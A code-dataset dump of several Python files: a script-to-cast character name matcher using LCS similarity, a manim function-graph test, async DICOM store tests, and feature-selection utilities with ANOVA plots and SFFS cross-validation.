self.dialog_count = utils.get_dialog_count(self.dialog)
# self.lev = LevSimilarity(threshold=0.8)
self.lcs = LCSSimilarity()
self.lcsdiff = LCSDiffSimilarity(threshold=0.8)
self.sim = self.lcsdiff
def map(self):
print("Processing Movie %s" % self.dialog['title'])
self._reduce_characters()
self.parsed_to_count = [(x, self.dialog_count[x]) for x in self.parsed_characters]
self.parsed_to_count.sort(key=lambda x: x[1], reverse=True)
self.char_map = {}
if DEBUG:
print("Number of parsed characters %d" % len(self.parsed_characters))
print("Number of actual characters %d" % len(self.actual_characters))
print("--------")
print("Dialog Count:")
for key, value in self.dialog_count.items():
print('%s,%s' % (key.encode(), value))
print("--------")
unmapped_parsed = set(self.parsed_characters)
unmapped_actual = set(self.actual_characters)
# map extremely close matches
self._map_characters(unmapped_parsed, unmapped_actual, sim=self.sim, threshold=0.98)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
# map the top 15 cast
for character in self.actual_characters[0:15]:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(5,10)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=4)
if character not in unmapped_actual:
break
if DEBUG:
print("---------------------------------")
print("After new heurstic")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
for character in self.actual_characters:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(7,10)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=1)
if character not in unmapped_actual:
break
self.sim.threshold = 0.8
# Map those who have a lot of lines
if DEBUG:
print("Mapping talkative")
self._map_talkative_characters(unmapped_parsed, unmapped_actual, sim=self.sim, min_lines=10)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
if DEBUG:
print("Mapping all actuals")
for character in self.actual_characters:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(5,7)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=1)
if character not in unmapped_actual:
break
self.sim.threshold = 0.6
# Final pass at talkative characters
self._map_talkative_characters(unmapped_parsed, unmapped_actual, sim=self.sim, min_lines=10)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed), [x.encode() for x in unmapped_parsed])
print("Unmapped actual characters: %d: " % len(unmapped_actual), [x.encode() for x in unmapped_actual])
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
self._update_dialog(unmapped_parsed, unmapped_actual)
bad_map = False
for char in self.actual_characters[0:8]:
if char in unmapped_actual and self.character_info[char]['character_order'] < 8:
print('%s with import %d is still unmapped' % (char, self.character_info[char]['character_order']))
bad_map = True
for tup in self.parsed_to_count:
if tup[1] > 10 and tup[0] in unmapped_parsed:
print("Character with a lot of dialog remains unmapped! %s" % tup[0])
bad_map = True
print("Finished processing movie %s with id %s" % (self.dialog['title'], self.dialog['tmdb_id']))
if bad_map and int(self.dialog['tmdb_id']):
raise BadMapException()
def _update_dialog(self, unmapped_parsed, unmapped_actual):
parsed_characters_left = list(self.char_map.keys())
self.dialog['characters'] = parsed_characters_left
extended_char_map = {}
for parsed, actual in self.char_map.items():
distance = self.sim.get_similarity(clean_name(parsed), clean_name(actual))
extended_char_map[parsed] = {
'actual_name': actual,
'similarity': distance,
'character_order': self.character_info[actual]['character_order'],
'celeb_id': self.character_info[actual]['celeb_id'],
'actual_full_name': self.character_info[actual]['name']
}
self.dialog['char_map'] = extended_char_map
self.dialog['dialog'] = [x for x in self.dialog['dialog'] if x['character'] in self.char_map or self.dialog_count[x['character']] > 1]
for line in self.dialog['dialog']:
line['celeb_id'] = self.character_info[self.char_map[line['character']]]['celeb_id'] if line['character'] in self.char_map else None
unmapped_actual_map = {}
for actual in unmapped_actual:
unmapped_actual_map[actual] = {
'actual_name': actual,
'character_order': self.character_info[actual]['character_order'],
'celeb_id': self.character_info[actual]['celeb_id'],
'actual_full_name': self.character_info[actual]['name']
}
self.dialog['unmapped_film_characters'] = unmapped_actual_map
self.dialog['unmapped_script_characters']= list(unmapped_parsed)
def _map_characters(self, unmapped_parsed, unmapped_actual, sim=None, threshold=0.9):
"""
Maps characters that just happen to match exactly
@param unmapped_parsed - the set of currently unmapped characters
@param unmapped_actual - the set of currently unmapped characters from the movie data.
"""
if sim is None:
sim = self.sim
df = self._init_similarity_dataframe(list(unmapped_parsed), list(unmapped_actual), self.parsed_cleaned_names, self.actual_cleaned_names, sim=sim)
removed_parsed, removed_actual, result = self._map_to_characters(df, char_map=self.char_map, sim=sim, threshold=threshold)
unmapped_parsed.symmetric_difference_update(removed_parsed)
unmapped_actual.symmetric_difference_update(removed_actual)
def _map_specific_char(self, unmapped_parsed, unmapped_actual, character, sim=None, dialog_threshold=4):
if sim is None:
sim = self.sim
similarities = self._get_similarity_to_parts(unmapped_parsed, unmapped_actual, character, sim, dialog_threshold=dialog_threshold)
exact_matches = [key for key,value in similarities.items() if value['exact']]
if len(exact_matches) == 1:
self.char_map[exact_matches[0]] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(exact_matches[0])
return
elif len(exact_matches) > 1:
best_match = None
closest_val = sim.get_start_compare()
for exact in exact_matches:
# Break the tie by seeing which one is closer to the original name
similarity = sim.get_similarity(self.parsed_cleaned_names[exact], self.actual_cleaned_names[character])
if sim.is_closer(closest_val, similarity):
best_match = exact
closest_val = similarity
self.char_map[exact] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(exact)
return
else:
# Nothing matches exactly; find the closest and see if it's within the threshold
best_match = None
closest_val = sim.get_start_compare()
for other, match_data in similarities.items():
similarity = match_data['similarity']
if sim.is_closer(closest_val, similarity):
best_match = other
closest_val = similarity
# if character == "Scarlett O'Donnell":
# print('foo')
# print(character, best_match, closest_val)
if sim.is_within_threshold(closest_val):
self.char_map[best_match] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(best_match)
return
    def _get_similarity_to_parts(self, unmapped_parsed, unmapped_actual, character, sim=None, dialog_threshold=4):
        """
        Obtains the similarity of possible character names in the film metadata
        to names obtained from the script
        @param unmapped_parsed: set of unmapped characters from the script
        @param unmapped_actual: set of unmapped characters from the metadata
        @param character: the film character whose name variants are scored
        @param sim: a similarity object
        @param dialog_threshold: minimum number of lines the character from the script needs to have to be mapped
        @returns {<scriptname>: {similarity: number, exact: boolean}} — the best
            similarity over all name variants, and whether any variant matched exactly
        """
        if sim is None:
            sim = self.sim
        if len(unmapped_parsed) == 0:
            raise BadMapException("Can't map character %s as there's no one left to map to!" % character.encode())
        # Phase 1: score every (script name, name-subset variant) pair.
        result = {}
        possible_names = self._get_all_possible_cleaned_names(character)
        for other in unmapped_parsed:
            # Skip script characters without enough dialog to be credible matches.
            if self.dialog_count[other] < dialog_threshold:
                continue
            cleaned_other = self.parsed_cleaned_names[other]
            for possible in possible_names:
                similarity, exact = self._best_similarities_with_nicknames(possible, cleaned_other, sim=sim)
                result.setdefault(other, {})[possible] = {
                    'similarity': similarity,
                    'exact': exact
                }
        # Phase 2: reduce per script name — keep the best similarity across
        # all variants and OR together the exact-match flags.
        ret = {}
        for script_name, inner in result.items():
            closest_val = sim.get_start_compare()
            exact = False
            for possible_name, results in inner.items():
                similarity = results['similarity']
                exact |= results['exact']
                if sim.is_closer(closest_val, similarity):
                    closest_val = similarity
            ret[script_name] = {
                'similarity': closest_val,
                'exact': exact
            }
        return ret
def _best_similarities_with_nicknames(self, cleaned_actual_name, cleaned_parsed_name, sim=None):
if sim is None:
sim = self.sim
parts = cleaned_actual_name.split(' ')
part_possibilities = []
for part in parts:
nicks = self.nicknames.get_nicknames(part, set())
nicks.add(part)
part_possibilities.append(list(nicks))
# https://stackoverflow.com/questions/798854/all-combinations-of-a-list-of-lists
combinations = list(itertools.product(*part_possibilities))
closest_val = sim.get_start_compare()
best_name = None
for combination in combinations:
name = clean_name(' '.join(combination))
similarity = sim.get_similarity(name, cleaned_parsed_name)
if sim.is_closer(closest_val, similarity):
best_name = name
closest_val = similarity
return closest_val, sim.is_exact_match(best_name, cleaned_parsed_name)
def _get_all_possible_cleaned_names(self, name):
cleaned_name = self.actual_cleaned_names[name]
parts = cleaned_name.split(" ")
# powerset; see https://docs.python.org/3.7/library/itertools.html#recipes
combinations = itertools.chain.from_iterable(itertools.combinations(parts, r) for r in range(1,len(parts)))
return [clean_name(' '.join(x)) for x in combinations]
    def _map_specific_characters(self, unmapped_parsed, unmapped_actual, actual_chars, sim=None, dialog_threshold=4):
        """
        maps characters from the film meta data to parsed characters
        @param unmapped_parsed: set of unmapped characters from the script
        @param unmapped_actual: set of unmapped characters from the metadata
        @param actual_chars: iterable of characters to map from the metadata
        @param sim: a similarity object
        @param dialog_threshold: minimum number of lines the character from the script needs to have to be mapped
        """
        if sim is None:
            sim = self.sim
        if len(unmapped_parsed) == 0 or len(unmapped_actual) == 0:
            return
        # Candidate script names with enough dialog; the list is computed once,
        # so the `other not in unmapped_parsed` re-check below guards against
        # names mapped earlier in this same loop.
        talkative_chars = [x[0] for x in self.parsed_to_count if x[0] in unmapped_parsed and x[1] >= dialog_threshold]
        for char in actual_chars:
            if char not in unmapped_actual:
                continue
            clean_char = self.actual_cleaned_names[char]
            closest_val = sim.get_start_compare()
            closest_name = None
            for other in talkative_chars:
                if other not in unmapped_parsed:
                    continue
                clean_other = self.parsed_cleaned_names[other]
                dist = sim.get_similarity(clean_char, clean_other)
                # Only candidates within the similarity threshold compete.
                if not sim.is_within_threshold(dist):
                    continue
                if sim.is_closer(closest_val, dist):
                    closest_val = dist
                    closest_name = other
            if closest_name is None:
                # if DEBUG:
                #     print("could not find name similar to %s" % char.encode())
                continue
            self.char_map[closest_name] = char
            unmapped_actual.remove(char)
            unmapped_parsed.remove(closest_name)
def _map_talkative_characters(self, unmapped_parsed, unmapped_actual, min_lines=10, sim=None):
if sim is None:
sim = self.sim
if len(unmapped_parsed) == 0 or len(unmapped_actual) == 0:
return
talkative_chars = [x[0] for x in self.parsed_to_count if x[0] in unmapped_parsed and x[1] >= min_lines]
for char in talkative_chars:
clean_char = self.parsed_cleaned_names[char]
closest_val = sim.get_start_compare()
closest_name = None
for actual in unmapped_actual:
clean_actual = self.actual_cleaned_names[actual]
dist = sim.get_similarity(clean_char, clean_actual)
if sim.is_closer(closest_val, dist):
closest_val = dist
closest_name = actual
if closest_name is None:
continue
self.char_map[char] = closest_name
unmapped_parsed.remove(char)
unmapped_actual.remove(closest_name)
def _reduce_characters(self):
"""
Takes the list of characters parsed from the scripts
and attemps to find duplicates created due to script errors
"""
if DEBUG:
print("Number of characters %d" % len(self.parsed_characters))
self._dedupe_by_multi_name()
name_map = self._find_similar_names(self.parsed_characters, self.parsed_cleaned_names)
self._deduplicate_parsed_names(name_map)
def _deduplicate_parsed_names(self, name_map):
"""
Remove names if they're very very close to one another
"""
name_to_aliases = self._dedupe_by_script_error(name_map)
self._remove_aliases(name_to_aliases)
def _remove_aliases(self, name_to_aliases):
if DEBUG:
print("names to aliases:", name_to_aliases)
characters = set(self.parsed_characters)
for char, aliases in name_to_aliases.items():
for line in self.dialog['dialog']:
if line['character'] in aliases:
line['character'] = char
for alias in aliases:
if alias in characters:
characters.remove(alias)
self.parsed_characters = list(characters)
self.parsed_cleaned_names = {x: clean_name(x) for x in self.parsed_characters}
def _dedupe_by_script_error(self, name_map):
"""
Deduplicates by trying to find names that are off by a few characters.
Will not try on character names with not many characters in the name.
@param name_map: dict name -> aliases that are close
"""
ret = {}
removed = set()
for name in name_map.keys():
if name in removed:
continue
max_lines = self.dialog_count[name]
max_alias = name
aliases = self._get_aliases(name, name_map)
for alias in aliases:
line_count = self.dialog_count[name]
if line_count > max_lines:
max_lines = line_count
max_alias = alias
if max_alias in aliases:
aliases.remove(max_alias)
if max_alias != name:
aliases.add(name)
removed.update(aliases)
removed.add(name)
ret[max_alias] = aliases
return ret
def _dedupe_by_multi_name(self):
"""
See script argo. Not sure how many other scripts have this problem,
but basically some 'character names' are formatted as:
<char 1> <char 2>
when char 1 is talking to char 2
"""
result = {}
names = set(self.parsed_characters)
for name in names:
for other in names:
if name == other:
continue
if not other.startswith(name):
continue
rest = other[0:len(name)]
if rest in names:
result.setdefault(name, set()).add(other)
self._remove_aliases(result)
def _get_aliases(self, name, name_map):
aliases = set()
# Yes, this stupid recursion logic is kinda necessary.
# It's theoretically possible to create an infinite loop otherwise
self._get_aliases_recur(name, name_map, aliases)
if name in aliases:
aliases.remove(name)
return aliases
def _get_aliases_recur(self, name, name_map, aliases):
if name in aliases:
return
aliases.add(name)
for alias in name_map[name]:
self._get_aliases_recur(alias, name_map, aliases)
def _find_similar_names(self, names, cleaned_names, sim=None):
"""
Look for similar names among cleaned names, and
make a multimap from name to all names similar to it
"""
if sim is None:
sim = self.sim
multi_map = {}
for i in range(len(names) - 1):
char = names[i]
clean_char = cleaned_names[char]
if len(clean_char) <= 3:
continue
for j in range(i+1, len(names)):
other = names[j]
clean_other = cleaned_names[other]
if len(clean_other) <= 3:
continue
if self.dialog_count[char] > 10 and self.dialog_count[other] > 10:
# concerned about cases where core characters have very similar names
continue
# similarity = editdistance.eval(clean_char, clean_other)
# if similarity < 2:
if sim.is_within_threshold(sim.get_similarity(clean_char, clean_other),0.95):
multi_map.setdefault(char, set()).add(other)
multi_map.setdefault(other, set()).add(char)
return multi_map
def _init_similarity_dataframe(self, parsed_characters, actual_characters, parsed_map, actual_map, sim=None):
if sim is None:
sim = self.sim
df = pd.DataFrame({'parsed_name': parsed_characters})
df.set_index('parsed_name', inplace=True)
for char in actual_characters:
df[char] = 0.0
for row in df.itertuples():
for col in df.columns:
df.loc[row.Index, col] = sim.get_similarity(parsed_map[row.Index], actual_map[col])
return df
def _map_to_characters(self, df, char_map={}, sim=None, usemin=False, threshold=0.9):
"""
Maps characters
"""
if sim is None:
sim=self.sim
removed_parsed = set()
removed_actual = set()
while df.shape[0] > 0 and df.shape[1] > 0:
if usemin:
vals_col = df.idxmin(axis=1)
val = df.values.min()
else:
vals_col = df.idxmax(axis=1)
val = df.values.max()
if not sim.is_within_threshold(val, threshold):
break
rows_to_remove = set()
columns_to_remove = set()
for index, col in vals_col.iteritems():
if index in rows_to_remove or col in columns_to_remove:
continue
if val == df.loc[index, col]:
char_map[index] = col
rows_to_remove.add(index)
columns_to_remove.add(col)
df = df.drop(labels=rows_to_remove, axis=0)
df = df.drop(labels=columns_to_remove, axis=1)
if len(rows_to_remove) == 0:
break
removed_parsed = removed_parsed.union(rows_to_remove)
removed_actual = removed_actual.union(columns_to_remove)
return removed_parsed, removed_actual, char_map
    def to_json(self, output_dir):
        """Serialize the updated dialog dict to <output_dir>/<script stem>.json."""
        with open(os.path.join(output_dir, os.path.splitext(self.dialog['file'])[0] + '.json'),'w', encoding='utf-8') as f:
            json.dump(self.dialog, f, indent=4)
def clean_name(name):
    """Normalize a character name: strip accents/punctuation, lowercase,
    then sort the words so word order does not matter."""
    ascii_form = normalize_unicode_to_ascii(name)
    return sort_name(ascii_form)
def normalize_unicode_to_ascii(name):
    """Lowercase ``name``, drop non-ASCII characters (after NFKD
    decomposition so accented letters keep their base letter), replace every
    non-alphanumeric character with a space, and collapse whitespace runs to
    single spaces.
    """
    ascii_bytes = unicodedata.normalize('NFKD', name).encode('ASCII', 'ignore')
    val = ascii_bytes.decode('utf-8').lower()
    val = re.sub('[^A-Za-z0-9 ]+', ' ', val)
    # BUG FIX (warning): use a raw string — '\s' in a plain literal is an
    # invalid escape sequence flagged by recent Python versions.
    val = re.sub(r'\s+', ' ', val)
    return val
def sort_name(name):
    """Return the space-separated words of ``name`` in sorted order, joined
    by single spaces, with surrounding whitespace stripped."""
    return ' '.join(sorted(name.split(' '))).strip()
class Similarity():
    """Abstract interface for name-similarity metrics.

    Concrete implementations decide whether larger or smaller values mean
    "more similar"; callers must therefore use is_closer /
    is_within_threshold rather than comparing raw values directly.
    """
    def get_similarity(self, name1, name2):
        """Return the similarity value between the two names."""
        pass
    def is_within_threshold(self,result, threshold=4):
        """Return True if ``result`` counts as a good-enough match."""
        pass
    def get_start_compare(self):
        """Return the sentinel 'worst possible' value to seed comparisons."""
        pass
    def is_exact_match(self, name1, name2):
        """Return True if the two names are considered identical."""
        pass
    def is_closer(self,previous_result, current_result):
        """Return True if ``current_result`` beats ``previous_result``."""
        pass
class LCSSimilarity(Similarity):
    """Similarity based on the raw longest-common-subsequence length.

    Larger values mean more similar; thresholds are absolute character counts.
    """
    def get_similarity(self, name1, name2):
        # BUG FIX: the LCS length was computed but never returned
        # (the method implicitly returned None).
        return lcs(name1, name2)
    def is_within_threshold(self, result, threshold=4):
        return result >= threshold
    def get_start_compare(self):
        # Below any real LCS length (which is always >= 0).
        return -1
    def is_exact_match(self, name1, name2):
        # LCS can equal the longer length only when the names are identical.
        return self.get_similarity(name1, name2) == max(len(name1), len(name2))
    def is_closer(self, previous_result, current_result):
        return previous_result < current_result
class LCSDiffSimilarity(Similarity):
    """Length-normalized LCS similarity in [0, 1].

    Computes 2 * LCS(a, b) / (len(a) + len(b)): 1.0 for identical names,
    0.0 for names with nothing in common.
    """
    def __init__(self, threshold=0.0):
        self.threshold = threshold
    def get_similarity(self, name1, name2):
        combined_length = len(name1) + len(name2)
        common = lcs(name1, name2)
        return 2 * float(common) / float(combined_length)
    def is_within_threshold(self, result, threshold=None):
        effective = self.threshold if threshold is None else threshold
        return result >= effective
    def get_start_compare(self):
        # Below any real similarity (always >= 0.0).
        return -1.0
    def is_exact_match(self, name1, name2):
        # Compare against 0.995 rather than exactly 1.0 to tolerate
        # floating-point rounding.
        return self.get_similarity(name1, name2) > 0.995
    def is_closer(self, previous_result, current_result):
        return previous_result < current_result
# class LevSimilarity(Similarity):
# def __init__(self, threshold=0.0):
# self.threshold = threshold
# def get_similarity(self, name1, name2):
# total = float(len(name1) + len(name2))
# max_val = max(len(name1), len(name2))
# return float((max_val - editdistance.eval(name1, name2))*2) / total
# def is_within_threshold(self,result, threshold=None):
# if threshold is None:
# threshold = self.threshold
# return result >= threshold
# def get_start_compare(self):
# return -1.0
# def is_exact_match(self, name1, name2):
# return self.get_similarity(name1, name2) > 0.995
# def is_closer(self, previous_result, current_result):
# return previous_result < current_result
class NicknameMap():
    """Bidirectional name <-> nickname lookup built from a CSV file.

    Each CSV row is a canonical name followed by its nicknames; lookups are
    symmetric (nickname -> name works too). Every name is cleaned with
    clean_name before being stored.
    """
    def __init__(self, namesfile):
        self._map = {}
        with open(namesfile, 'r', encoding='utf-8') as f:
            reader = csv.reader(f)
            for row in reader:
                row = [clean_name(x) for x in row]
                name = row[0]
                for i in range(1, len(row)):
                    # Link both directions so a lookup works from either side.
                    self._map.setdefault(name, set()).add(row[i])
                    self._map.setdefault(row[i], set()).add(name)
    def get_nicknames(self, name, default=None):
        """Return the set of names linked to ``name``; ``default`` if unknown.

        When ``default`` is a set, a *copy* of the stored set is returned so
        callers can mutate it safely; otherwise the stored set itself (or
        ``default``) is returned.
        """
        # isinstance instead of `type(...) is set` so set subclasses also get
        # the defensive-copy behavior.
        if isinstance(default, set):
            return set(self._map.get(name, default))
        else:
            return self._map.get(name, default)
def parse_args(*args):
    """Build and run the command-line argument parser.

    When called with more than one positional argument, those arguments are
    parsed instead of sys.argv (useful for driving from code or tests).
    """
    parser = argparse.ArgumentParser(description='Map characters to cast')
    parser.add_argument('-i', '--input', required=True,
                        help='The input; accepts either a directory or a file; if a directory, then map using the entire directory')
    parser.add_argument('--cast_data', default='full_celeb_film_info.csv',
                        help='csv file with a list of the characters ("full_celeb_film_info.csv")')
    # See https://github.com/carltonnorthern/nickname-and-diminutive-names-lookup/blob/master/names.csv
    parser.add_argument('--nickname_map', default='names.csv',
                        help='csv file with a mapping of names to nicknames')
    parser.add_argument('-o', '--output', required=True, help='output directory')
    if len(args) > 1:
        return parser.parse_args(args)
    return parser.parse_args()
if __name__ == '__main__':
    # Command-line entry point: parse the CLI args and run the mapping pipeline.
    args = parse_args()
    main(args)
# main(r'E:\git\movie-analytics-112\processed_scripts\17-again.json', r'E:\git\movie-analytics-112\full_celeb_film_info.csv',os.path.join(os.getcwd(), 'mapped_scripts'))
| 18,809 | 12,773 | 853 |
63599d2a530e91d2e1d53e1418f911f544a0d91a | 295 | py | Python | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | 2 | 2021-08-22T14:51:53.000Z | 2021-10-17T16:01:24.000Z | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | null | null | null | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | 1 | 2021-03-31T20:46:51.000Z | 2021-03-31T20:46:51.000Z | from manim import *
from tests.test_graphical_units.testing.frames_comparison import frames_comparison
__module_test__ = "functions"
@frames_comparison
| 26.818182 | 87 | 0.762712 | from manim import *
from tests.test_graphical_units.testing.frames_comparison import frames_comparison
__module_test__ = "functions"
@frames_comparison
def test_FunctionGraph(scene):
    """Graphical regression test: render a cosine FunctionGraph over
    [-PI, PI] into the frame-comparison scene."""
    graph = FunctionGraph(lambda x: 2 * np.cos(0.5 * x), x_range=[-PI, PI], color=BLUE)
    scene.add(graph)
| 118 | 0 | 22 |
49ec8ce77ae6074466a6eae762a33a328017ef91 | 1,000 | py | Python | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 11 | 2021-05-07T08:37:56.000Z | 2022-03-23T17:05:08.000Z | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 4 | 2021-08-05T02:18:09.000Z | 2022-03-17T00:24:13.000Z | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 2 | 2021-08-04T06:33:42.000Z | 2022-01-12T12:09:22.000Z | import os
from pathlib import Path
from contextlib import AsyncExitStack
from tempfile import TemporaryDirectory
from glob import glob
import pydicom
from pytest import mark
from ...store.local_dir import LocalDir
from ..conftest import dicom_dir, dicom_files
@mark.asyncio
@mark.asyncio
| 27.027027 | 66 | 0.682 | import os
from pathlib import Path
from contextlib import AsyncExitStack
from tempfile import TemporaryDirectory
from glob import glob
import pydicom
from pytest import mark
from ...store.local_dir import LocalDir
from ..conftest import dicom_dir, dicom_files
@mark.asyncio
async def test_gen_chunks(make_local_dir):
    """Every dataset in the LocalDir should be yielded exactly once across
    all generated chunks (chunk size capped at 2)."""
    local_dir, init_qr, _ = make_local_dir("all", max_chunk=2)
    n_dcm_gen = 0
    async for chunk in local_dir.gen_chunks():
        async for dcm in chunk.gen_data():
            print(dcm)
            n_dcm_gen += 1
    # Total generated datasets must match the initial query/retrieve set.
    assert n_dcm_gen == len(init_qr)
@mark.asyncio
async def test_send(dicom_files):
    """Sending each test DICOM dataset through LocalDir.send() should write
    one .dcm file per input into the destination directory."""
    with TemporaryDirectory() as tmp_dir:
        local_dir = LocalDir(tmp_dir)
        async with local_dir.send() as send_q:
            for dcm_path in dicom_files:
                dcm = pydicom.dcmread(str(dcm_path))
                await send_q.put(dcm)
        # LocalDir may nest output in subdirectories, hence the recursive glob.
        n_files = len(glob(tmp_dir + "/**/*.dcm", recursive=True))
        assert n_files == len(dicom_files)
| 660 | 0 | 44 |
f2ba582488da19c49c781d84a748100228d2a6ee | 3,834 | py | Python | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | '''Utility functions for the Feature Selection Notebook'''
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
import lightgbm as lgbm
def plot_ANOVA(imp_f_classif, save=True):
    '''
    Plot the ANOVA F-statistic of every feature as a bar chart.
    If save is True the figure is written to
    plots/feature_selection/ANOVA.png.

    Input:
        imp_f_classif: ANOVA importance dataframe ('Features', 'F_score')
    Output:
        The plot of feature importance based on ANOVA
    '''
    n_features = imp_f_classif.shape[0]
    figure, ax = plt.subplots(figsize=(35, 10))
    ax.set_title("ANOVA F-statistics", fontsize=30)
    plt.bar(range(n_features), imp_f_classif.F_score, align="center")
    plt.xticks(range(n_features), imp_f_classif['Features'],
               rotation='vertical', fontsize=30)
    plt.yticks(fontsize=30)
    plt.xlim([-1, n_features])
    plt.grid(True)
    plt.ylabel('F(λ)', fontsize=30)
    plt.xlabel('Feature', fontsize=30)
    if save:
        plt.savefig('plots/feature_selection/ANOVA.png',
                    dpi=figure.dpi, bbox_inches='tight')
    return plt.show()
def generate_SFFSinfo(X, y, l, cv=5, balance_method=None):
    '''
    This function will generate additional info for the
    SFFS. In particular, it will collect F1-macro averaged
    score and the mean accuracy for each feature subset.
    Input:
        X: the features
        y: the targets
        l: list of selected features
        cv: number of cross validation folds
        balance_method: (optional) oversampling method chosen
    Output:
        A dataframe containing the collected metrics
    '''
    info_di = {}
    # One row per CV fold: column 0 = accuracy, column 1 = macro F1.
    # The same buffer is overwritten for each feature subset.
    cv_info = np.zeros((cv, 2))
    skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=42)
    #Each feature selected by SFFS
    for i, features in enumerate(l, start=1):
        X_step = X[features].values
        #Cross validation for each step
        for j, (train_idx, valid_idx) in enumerate(skf.split(X_step, y)):
            X_train, y_train = X_step[train_idx], y[train_idx]
            X_valid, y_valid = X_step[valid_idx], y[valid_idx]
            #Resample if required
            # Resampling is applied to the training fold only, so the
            # validation fold keeps the original class distribution.
            if balance_method:
                X_train, y_train = balance_method.fit_resample(X_train, y_train)
            model = lgbm.LGBMClassifier()
            model.fit(X_train, y_train)
            y_pred = model.predict(X_valid)
            cv_info[j, 0] = accuracy_score(y_valid, y_pred)
            cv_info[j, 1] = f1_score(y_valid, y_pred, average='macro')
        info_di[i] = {
            'feature_names' : features,
            'mean_acc' : np.mean(cv_info[:, 0]),
            'std_acc' : np.std(cv_info[:, 0]),
            'mean_f1' : np.mean(cv_info[:, 1]),
            'std_f1' : np.std(cv_info[:, 1]),
        }
    # Transpose so each feature-subset size becomes one row.
    return pd.DataFrame.from_dict(info_di).T
def plot_SFFS(scores, save=True):
    '''
    Plot accuracy and macro-F1 (with std-dev error bars) against the number
    of features selected by SFFS. If save is True the figure is written to
    Plots/FeatureSelection/SFFS.png.

    Input:
        scores: the dataframe with SFFS results
    Output:
        The plot of SFFS results
    '''
    figure = plt.figure(figsize=(8, 6))
    plt.errorbar(scores.index, scores['mean_acc'],
                 yerr=scores['std_acc'], label='Accuracy', linewidth=2)
    plt.errorbar(scores.index, scores['mean_f1'],
                 yerr=scores['std_f1'], label='F1_score', linewidth=2)
    plt.legend(loc='upper left')
    plt.ylabel('Metric value')
    plt.xlabel('Features used')
    plt.grid(True)
    if save:
        plt.savefig('Plots/FeatureSelection/SFFS.png',
                    dpi=figure.dpi, bbox_inches='tight')
    return plt.show()
| 31.42623 | 106 | 0.619718 | '''Utility functions for the Feature Selection Notebook'''
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
import lightgbm as lgbm
def plot_ANOVA(imp_f_classif, save=True):
    '''
    Plot the ANOVA F-statistic of every feature as a bar chart.
    If save is True the figure is written to
    plots/feature_selection/ANOVA.png.

    Input:
        imp_f_classif: ANOVA importance dataframe ('Features', 'F_score')
    Output:
        The plot of feature importance based on ANOVA
    '''
    n_features = imp_f_classif.shape[0]
    figure, ax = plt.subplots(figsize=(35, 10))
    ax.set_title("ANOVA F-statistics", fontsize=30)
    plt.bar(range(n_features), imp_f_classif.F_score, align="center")
    plt.xticks(range(n_features), imp_f_classif['Features'],
               rotation='vertical', fontsize=30)
    plt.yticks(fontsize=30)
    plt.xlim([-1, n_features])
    plt.grid(True)
    plt.ylabel('F(λ)', fontsize=30)
    plt.xlabel('Feature', fontsize=30)
    if save:
        plt.savefig('plots/feature_selection/ANOVA.png',
                    dpi=figure.dpi, bbox_inches='tight')
    return plt.show()
def generate_SFFSinfo(X, y, l, cv=5, balance_method=None):
    '''
    This function will generate additional info for the
    SFFS. In particular, it will collect F1-macro averaged
    score and the mean accuracy for each feature subset.
    Input:
        X: the features
        y: the targets
        l: list of selected features
        cv: number of cross validation folds
        balance_method: (optional) oversampling method chosen
    Output:
        A dataframe containing the collected metrics
    '''
    info_di = {}
